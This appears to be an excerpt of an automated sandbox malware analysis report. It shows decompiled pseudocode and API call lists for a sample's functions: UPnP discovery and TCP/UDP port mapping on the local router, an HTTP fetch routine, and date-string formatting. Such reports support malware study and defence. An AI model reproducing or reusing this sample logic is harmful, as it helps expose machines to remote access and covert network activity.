                                                                                                                                                                                                                                                                                    0x0040cc66
                                                                                                                                                                                                                                                                                    0x0040cc6d
                                                                                                                                                                                                                                                                                    0x0040cc73
                                                                                                                                                                                                                                                                                    0x0040cc7d
                                                                                                                                                                                                                                                                                    0x0040cc86
                                                                                                                                                                                                                                                                                    0x0040cc91
                                                                                                                                                                                                                                                                                    0x0040cca1
                                                                                                                                                                                                                                                                                    0x0040ccab
                                                                                                                                                                                                                                                                                    0x0040ccb4
                                                                                                                                                                                                                                                                                    0x0040ccbc
                                                                                                                                                                                                                                                                                    0x0040ccc8
                                                                                                                                                                                                                                                                                    0x0040cccd
                                                                                                                                                                                                                                                                                    0x0040ccd0
                                                                                                                                                                                                                                                                                    0x0040ccd7
                                                                                                                                                                                                                                                                                    0x0040ccdd
                                                                                                                                                                                                                                                                                    0x0040cce2
                                                                                                                                                                                                                                                                                    0x0040cce5
                                                                                                                                                                                                                                                                                    0x0040ccec
                                                                                                                                                                                                                                                                                    0x0040ccff
                                                                                                                                                                                                                                                                                    0x0040cd04
                                                                                                                                                                                                                                                                                    0x0040cd0b
                                                                                                                                                                                                                                                                                    0x0040cd0b
                                                                                                                                                                                                                                                                                    0x0040cd15
                                                                                                                                                                                                                                                                                    0x0040cd15
                                                                                                                                                                                                                                                                                    0x0040cd27
                                                                                                                                                                                                                                                                                    0x0040cd27
                                                                                                                                                                                                                                                                                    0x0040cd35
                                                                                                                                                                                                                                                                                    0x0040cd35
                                                                                                                                                                                                                                                                                    0x0040cd43
                                                                                                                                                                                                                                                                                    0x0040cd43
                                                                                                                                                                                                                                                                                    0x0040cd49
                                                                                                                                                                                                                                                                                    0x0040cd4e
                                                                                                                                                                                                                                                                                    0x0040cd57

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: memset.NTDLL ref: 0040C288
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetCrackUrlA.WININET(0040D079,00000000,10000000,0000003C), ref: 0040C2D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C2E8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C321
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C357
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C37F
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C3C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetCloseHandle.WININET(00000000), ref: 0040C457
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: SysAllocString.OLEAUT32(00000000), ref: 0040C02E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: CoCreateInstance.OLE32(00410318,00000000,00004401,00410308,00000000), ref: 0040C056
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: SysFreeString.OLEAUT32(00000000), ref: 0040C0F1
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CD0B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CD15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                                                    • String ID: %S%S
                                                                                                                                                                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                                                    • Opcode ID: 86f6504e5494efba9a820ad851abc2735c65b1deacf7d2d6193f3942743fcb34
                                                                                                                                                                                                                                                                                    • Instruction ID: f6c0dd48525cf9db1308fcfd74a329a1c42d5f2fc6292bf47869dbcd9c674937
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86f6504e5494efba9a820ad851abc2735c65b1deacf7d2d6193f3942743fcb34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB4129B5E00109DFDB04DBE4D885AEFB7B9BF88304F104669E505B7390D738AA45CBA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040D020() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				__imp__CoInitializeEx(0, 2);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t20 = E0040C580( &_v12,  &_v12);
                                                                                                                                                                                                                                                                                    				_t37 = _t36 + 4;
                                                                                                                                                                                                                                                                                    				_v8 = _t20;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_t20 = E0040CC30( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                                                                                                                                                                                                                    						_t37 = _t37 + 4;
                                                                                                                                                                                                                                                                                    						 *0x416e24 = _t20;
                                                                                                                                                                                                                                                                                    						if( *0x416e24 == 0) {
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v20 = E00409540();
                                                                                                                                                                                                                                                                                    						_t31 =  *0x416e24; // 0x0
                                                                                                                                                                                                                                                                                    						E0040CFA0(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                                    						_t26 =  *0x416e24; // 0x0
                                                                                                                                                                                                                                                                                    						_t20 = E0040CFA0(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                                    						_t37 = _t37 + 0x20;
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return E00408D90(_t20, _v8, _v12, _v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040d02a
                                                                                                                                                                                                                                                                                    0x0040d030
                                                                                                                                                                                                                                                                                    0x0040d03b
                                                                                                                                                                                                                                                                                    0x0040d040
                                                                                                                                                                                                                                                                                    0x0040d043
                                                                                                                                                                                                                                                                                    0x0040d04a
                                                                                                                                                                                                                                                                                    0x0040d050
                                                                                                                                                                                                                                                                                    0x0040d062
                                                                                                                                                                                                                                                                                    0x0040d074
                                                                                                                                                                                                                                                                                    0x0040d079
                                                                                                                                                                                                                                                                                    0x0040d07c
                                                                                                                                                                                                                                                                                    0x0040d088
                                                                                                                                                                                                                                                                                    0x0040d05f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d05f
                                                                                                                                                                                                                                                                                    0x0040d08f
                                                                                                                                                                                                                                                                                    0x0040d0a0
                                                                                                                                                                                                                                                                                    0x0040d0a7
                                                                                                                                                                                                                                                                                    0x0040d0bd
                                                                                                                                                                                                                                                                                    0x0040d0c3
                                                                                                                                                                                                                                                                                    0x0040d0c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d0c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d0dc
                                                                                                                                                                                                                                                                                    0x0040d0e2

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 0040D02A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: socket.WS2_32(00000002,00000002,00000011), ref: 0040C59A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: htons.WS2_32(0000076C), ref: 0040C5D0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: inet_addr.WS2_32(239.255.255.250), ref: 0040C5DF
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C5FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: bind.WS2_32(000000FF,?,00000010), ref: 0040C633
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: lstrlenA.KERNEL32(00410578,00000000,?,00000010), ref: 0040C64C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: sendto.WS2_32(000000FF,00410578,00000000), ref: 0040C65B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C675
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040CC30: SysFreeString.OLEAUT32(00000000), ref: 0040CD0B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040CC30: SysFreeString.OLEAUT32(00000000), ref: 0040CD15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                                                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                                                    • Opcode ID: 014f018b2ad0d604453ca6d4d42fb9b10cc54ad83f4ff0cd62ecb7ebe3116a6f
                                                                                                                                                                                                                                                                                    • Instruction ID: d6482cf8f8518ba90fc7d027882e0c52926dc77542800e56e9404f82e9eb0b53
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 014f018b2ad0d604453ca6d4d42fb9b10cc54ad83f4ff0cd62ecb7ebe3116a6f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E811E4B4D01208EBD700EFE4EC45BAE7775AB04308F10866EE505772C2E679AE45CB5A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                                                                    callgraph 0 Function_00EA2E6A 1 Function_00EA2F68 2 Function_00EA2B6E 3 Function_00EA2DEC 4 Function_00EA16E0 17 Function_00EA1440 4->17 5 Function_00EA19E0 6 Function_00EA1160 5->6 8 Function_00EA2260 5->8 16 Function_00EA11C0 5->16 35 Function_00EA10A0 5->35 43 Function_00EA1230 6->43 7 Function_00EA1760 7->4 9 Function_00EA2660 10 Function_00EA29E5 44 Function_00EA2E31 10->44 11 Function_00EA2B78 11->3 11->44 60 Function_00EA2C14 11->60 12 Function_00EA1C7C 12->6 12->16 33 Function_00EA1120 12->33 13 Function_00EA21F2 13->6 13->16 13->33 14 Function_00EA1470 15 Function_00EA2F4D 18 Function_00EA2E45 19 Function_00EA2C5A 20 Function_00EA2652 21 Function_00EA18D0 22 Function_00EA17D0 42 Function_00EA18B0 22->42 50 Function_00EA1400 22->50 23 Function_00EA2CD0 24 Function_00EA2F50 25 Function_00EA29D1 26 Function_00EA1756 27 Function_00EA2857 27->3 31 Function_00EA2D20 27->31 32 Function_00EA26A0 27->32 27->44 28 Function_00EA1CAB 28->6 28->16 28->33 34 Function_00EA1320 28->34 55 Function_00EA1490 28->55 56 Function_00EA1390 28->56 29 Function_00EA2DAB 30 Function_00EA1B2D 30->6 30->16 30->33 31->23 57 Function_00EA2C90 31->57 32->7 41 Function_00EA23B0 32->41 49 Function_00EA1000 32->49 35->17 36 Function_00EA23A1 37 Function_00EA2B21 38 Function_00EA2A21 38->44 39 Function_00EA1C27 39->6 39->16 39->33 40 Function_00EA2DBF 41->9 41->21 41->22 48 Function_00EA2280 41->48 45 Function_00EA1BB6 45->6 45->16 45->33 46 Function_00EA2A36 46->0 47 Function_00EA2C34 46->47 61 Function_00EA2E95 46->61 48->5 48->42 48->50 51 Function_00EA2E98 52 Function_00EA2C1D 52->11 53 Function_00EA121D 54 Function_00EA2A1D 58 Function_00EA2811 58->52 59 Function_00EA2B17 59->51

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 108 ea1490-ea1522 109 ea1530-ea154c FileTimeToLocalFileTime FileTimeToSystemTime 108->109 110 ea1524-ea152e 108->110 111 ea1552-ea1579 GetTimeZoneInformation 109->111 110->111 113 ea157b-ea1581 111->113 114 ea1584-ea158c 111->114 113->114 115 ea1599-ea159e 114->115 116 ea158e-ea1597 114->116 117 ea15a4-ea15b4 115->117 116->117 118 ea15bf-ea15c5 117->118 119 ea15b6-ea15bb 117->119 120 ea15d0-ea15d7 118->120 121 ea15c7-ea15cc 118->121 119->118 122 ea15d9-ea15de 120->122 123 ea15e2-ea15e6 120->123 121->120 122->123 124 ea15e8-ea15ec 123->124 125 ea1659-ea165d 123->125 126 ea15fa 124->126 127 ea15ee-ea15f8 124->127 128 ea166b 125->128 129 ea165f-ea1669 125->129 130 ea1604-ea1657 wsprintfA 126->130 127->130 131 ea1675-ea16ce wsprintfA 128->131 129->131 132 ea16d1-ea16d4 130->132 131->132
                                                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                    			E00EA1490(FILETIME* _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v108;
                                                                                                                                                                                                                                                                                    				struct _TIME_ZONE_INFORMATION _v284;
                                                                                                                                                                                                                                                                                    				struct _FILETIME _v292;
                                                                                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                                                                                    				char _v300;
                                                                                                                                                                                                                                                                                    				char _v304;
                                                                                                                                                                                                                                                                                    				long _t105;
                                                                                                                                                                                                                                                                                    				signed int _t145;
                                                                                                                                                                                                                                                                                    				void* _t164;
                                                                                                                                                                                                                                                                                    				signed int _t170;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v84 = 0xea41d4;
                                                                                                                                                                                                                                                                                    				_v80 = 0xea41d8;
                                                                                                                                                                                                                                                                                    				_v76 = 0xea41dc;
                                                                                                                                                                                                                                                                                    				_v72 = 0xea41e0;
                                                                                                                                                                                                                                                                                    				_v68 = 0xea41e4;
                                                                                                                                                                                                                                                                                    				_v64 = 0xea41e8;
                                                                                                                                                                                                                                                                                    				_v60 = 0xea41ec;
                                                                                                                                                                                                                                                                                    				_v56 = 0xea41f0;
                                                                                                                                                                                                                                                                                    				_v52 = 0xea41f4;
                                                                                                                                                                                                                                                                                    				_v48 = 0xea41f8;
                                                                                                                                                                                                                                                                                    				_v44 = 0xea41fc;
                                                                                                                                                                                                                                                                                    				_v40 = 0xea4200;
                                                                                                                                                                                                                                                                                    				_v36 = 0xea4204;
                                                                                                                                                                                                                                                                                    				_v32 = 0xea4208;
                                                                                                                                                                                                                                                                                    				_v28 = 0xea420c;
                                                                                                                                                                                                                                                                                    				_v24 = 0xea4210;
                                                                                                                                                                                                                                                                                    				_v20 = 0xea4214;
                                                                                                                                                                                                                                                                                    				_v16 = 0xea4218;
                                                                                                                                                                                                                                                                                    				_v12 = 0xea421c;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					FileTimeToLocalFileTime(_a4,  &_v292);
                                                                                                                                                                                                                                                                                    					FileTimeToSystemTime( &_v292,  &_v108);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					GetLocalTime( &_v108);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v284.Bias = 0;
                                                                                                                                                                                                                                                                                    				_t105 = GetTimeZoneInformation( &_v284); // executed
                                                                                                                                                                                                                                                                                    				_v8 = _t105;
                                                                                                                                                                                                                                                                                    				_v92 = _v284.Bias;
                                                                                                                                                                                                                                                                                    				if(_v8 == 2) {
                                                                                                                                                                                                                                                                                    					_t145 = _v92 + _v284.DaylightBias;
                                                                                                                                                                                                                                                                                    					_t170 = _t145;
                                                                                                                                                                                                                                                                                    					_v92 = _t145;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v92 =  ~_v92;
                                                                                                                                                                                                                                                                                    				if(_t170 < 0) {
                                                                                                                                                                                                                                                                                    					_v296 =  ~_v92;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v296 = _v92;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v88 = _v296;
                                                                                                                                                                                                                                                                                    				if((_v108.wDayOfWeek & 0x0000ffff) > 6) {
                                                                                                                                                                                                                                                                                    					_v108.wDayOfWeek = 6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if((_v108.wMonth & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                                    					_v108.wMonth = 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if((_v108.wMonth & 0x0000ffff) > 0xc) {
                                                                                                                                                                                                                                                                                    					_v108.wMonth = 0xc;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_a12 == 0) {
                                                                                                                                                                                                                                                                                    					if(_v92 < 0) {
                                                                                                                                                                                                                                                                                    						_v304 = "-";
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v304 = "+";
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t87 =  &_v304; // 0xea4250
                                                                                                                                                                                                                                                                                    					_t94 = (_v108.wMonth & 0x0000ffff) * 4; // 0xea41ec
                                                                                                                                                                                                                                                                                    					return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t164 + (_v108.wDayOfWeek & 0x0000ffff) * 4 - 0x50)), _v108.wDay & 0x0000ffff,  *((intOrPtr*)(_t164 + _t94 - 0x38)), _v108.wYear & 0x0000ffff, _v108.wHour & 0x0000ffff, _v108.wMinute & 0x0000ffff, _v108.wSecond & 0x0000ffff,  *_t87, _v88 / 0x3c, _v88 % 0x3c);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_v92 < 0) {
                                                                                                                                                                                                                                                                                    						_v300 = 0xea4224;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v300 = 0xea4220;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t63 =  &_v300; // 0xea4224
                                                                                                                                                                                                                                                                                    					_t70 = (_v108.wMonth & 0x0000ffff) * 4; // 0xea41ec
                                                                                                                                                                                                                                                                                    					return wsprintfA(_a8, "%u %s %u %.2u:%.2u:%.2u %s%.2u%.2u", _v108.wDay & 0x0000ffff,  *((intOrPtr*)(_t164 + _t70 - 0x38)), _v108.wYear & 0x0000ffff, _v108.wHour & 0x0000ffff, _v108.wMinute & 0x0000ffff, _v108.wSecond & 0x0000ffff,  *_t63, _v88 / 0x3c, _v88 % 0x3c);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}



































                                                                                                                                                                                                                                                                                    0x00ea1499
                                                                                                                                                                                                                                                                                    0x00ea14a0
                                                                                                                                                                                                                                                                                    0x00ea14a7
                                                                                                                                                                                                                                                                                    0x00ea14ae
                                                                                                                                                                                                                                                                                    0x00ea14b5
                                                                                                                                                                                                                                                                                    0x00ea14bc
                                                                                                                                                                                                                                                                                    0x00ea14c3
                                                                                                                                                                                                                                                                                    0x00ea14ca
                                                                                                                                                                                                                                                                                    0x00ea14d1
                                                                                                                                                                                                                                                                                    0x00ea14d8
                                                                                                                                                                                                                                                                                    0x00ea14df
                                                                                                                                                                                                                                                                                    0x00ea14e6
                                                                                                                                                                                                                                                                                    0x00ea14ed
                                                                                                                                                                                                                                                                                    0x00ea14f4
                                                                                                                                                                                                                                                                                    0x00ea14fb
                                                                                                                                                                                                                                                                                    0x00ea1502
                                                                                                                                                                                                                                                                                    0x00ea1509
                                                                                                                                                                                                                                                                                    0x00ea1510
                                                                                                                                                                                                                                                                                    0x00ea1517
                                                                                                                                                                                                                                                                                    0x00ea1522
                                                                                                                                                                                                                                                                                    0x00ea153b
                                                                                                                                                                                                                                                                                    0x00ea154c
                                                                                                                                                                                                                                                                                    0x00ea1524
                                                                                                                                                                                                                                                                                    0x00ea1528
                                                                                                                                                                                                                                                                                    0x00ea1528
                                                                                                                                                                                                                                                                                    0x00ea1552
                                                                                                                                                                                                                                                                                    0x00ea1563
                                                                                                                                                                                                                                                                                    0x00ea1569
                                                                                                                                                                                                                                                                                    0x00ea1572
                                                                                                                                                                                                                                                                                    0x00ea1579
                                                                                                                                                                                                                                                                                    0x00ea157e
                                                                                                                                                                                                                                                                                    0x00ea157e
                                                                                                                                                                                                                                                                                    0x00ea1581
                                                                                                                                                                                                                                                                                    0x00ea1581
                                                                                                                                                                                                                                                                                    0x00ea1589
                                                                                                                                                                                                                                                                                    0x00ea158c
                                                                                                                                                                                                                                                                                    0x00ea159e
                                                                                                                                                                                                                                                                                    0x00ea158e
                                                                                                                                                                                                                                                                                    0x00ea1591
                                                                                                                                                                                                                                                                                    0x00ea1591
                                                                                                                                                                                                                                                                                    0x00ea15aa
                                                                                                                                                                                                                                                                                    0x00ea15b4
                                                                                                                                                                                                                                                                                    0x00ea15bb
                                                                                                                                                                                                                                                                                    0x00ea15bb
                                                                                                                                                                                                                                                                                    0x00ea15c5
                                                                                                                                                                                                                                                                                    0x00ea15cc
                                                                                                                                                                                                                                                                                    0x00ea15cc
                                                                                                                                                                                                                                                                                    0x00ea15d7
                                                                                                                                                                                                                                                                                    0x00ea15de
                                                                                                                                                                                                                                                                                    0x00ea15de
                                                                                                                                                                                                                                                                                    0x00ea15e6
                                                                                                                                                                                                                                                                                    0x00ea165d
                                                                                                                                                                                                                                                                                    0x00ea166b
                                                                                                                                                                                                                                                                                    0x00ea165f
                                                                                                                                                                                                                                                                                    0x00ea165f
                                                                                                                                                                                                                                                                                    0x00ea165f
                                                                                                                                                                                                                                                                                    0x00ea1678
                                                                                                                                                                                                                                                                                    0x00ea1684
                                                                                                                                                                                                                                                                                    0x00ea168d
                                                                                                                                                                                                                                                                                    0x00ea16ac
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea15e8
                                                                                                                                                                                                                                                                                    0x00ea15ec
                                                                                                                                                                                                                                                                                    0x00ea15fa
                                                                                                                                                                                                                                                                                    0x00ea15ee
                                                                                                                                                                                                                                                                                    0x00ea15ee
                                                                                                                                                                                                                                                                                    0x00ea15ee
                                                                                                                                                                                                                                                                                    0x00ea1607
                                                                                                                                                                                                                                                                                    0x00ea1613
                                                                                                                                                                                                                                                                                    0x00ea161c
                                                                                                                                                                                                                                                                                    0x00ea163b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1654

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00EA1528
                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00EA153B
                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA154C
                                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(00000000), ref: 00EA1563
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA164E
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA16C8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$File$Localwsprintf$InformationSystemZone
                                                                                                                                                                                                                                                                                    • String ID: $B$%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$%u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$FZou$Feb$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$PB$Sep$Sun$Tue$Wed$A$A$A
                                                                                                                                                                                                                                                                                    • API String ID: 1439763326-3090476912
                                                                                                                                                                                                                                                                                    • Opcode ID: 156a319c00bd6ee311ad262370e794d1eb5203b34671aefa75ad7f773f4d31a0
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a59c532fa324bea2726a3da475782f12773f4804df931fea030a82a8fd31973
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 156a319c00bd6ee311ad262370e794d1eb5203b34671aefa75ad7f773f4d31a0
